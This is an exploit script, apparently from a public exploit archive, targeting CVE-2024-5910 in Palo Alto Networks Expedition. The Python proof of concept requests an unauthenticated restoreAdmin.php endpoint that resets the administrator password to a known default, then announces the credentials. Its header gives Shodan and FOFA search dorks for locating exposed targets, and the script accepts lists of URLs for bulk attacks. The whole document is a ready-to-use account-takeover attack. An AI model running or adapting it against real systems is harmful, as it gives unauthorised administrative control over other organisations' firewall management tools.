# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover # Shodan Dork: html:"expedition project" # # FOFA Dork: "expedition project" && icon_hash="1499876150" # # Exploit Author: ByteHunter # # Email: 0xByteHunter@proton.me # # Vulnerable Versions: 1.2 < 1.2.92 # # Tested on: 1.2.90.1 & 1.2.75 # # CVE : CVE-2024-5910 # ############################ # ################################################################################################ import requests import argparse import warnings from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter("ignore", InsecureRequestWarning) ENDPOINT = '/OS/startup/restore/restoreAdmin.php' def send_request(base_url): url = f"{base_url}{ENDPOINT}" print(f"Testing URL: {url}") try: response = requests.get(url, verify=False, timeout=7) if response.status_code == 200: print("✓ Admin password restored to: 'paloalto'\n") print("✓ admin panel is now accessable via ==> admin:paloalto creds") else: print(f"Request failed with status code: {response.status_code}\n") except requests.exceptions.RequestException as e: print(f"Error sending request to {url}") #{e} def main(): parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC') parser.add_argument('-u', '--url', type=str, help='single target URL') parser.add_argument('-l', '--list', type=str, help='URL target list') args = parser.parse_args() if args.url: send_request(args.url) elif args.list: try: with open(args.list, 'r') as file: urls = file.readlines() for base_url in urls: send_request(base_url.strip()) except FileNotFoundError: print(f"File not found: {args.list}") else: print("I need a URL address with -u or a URL file list with -l.") if __name__ == '__main__': main()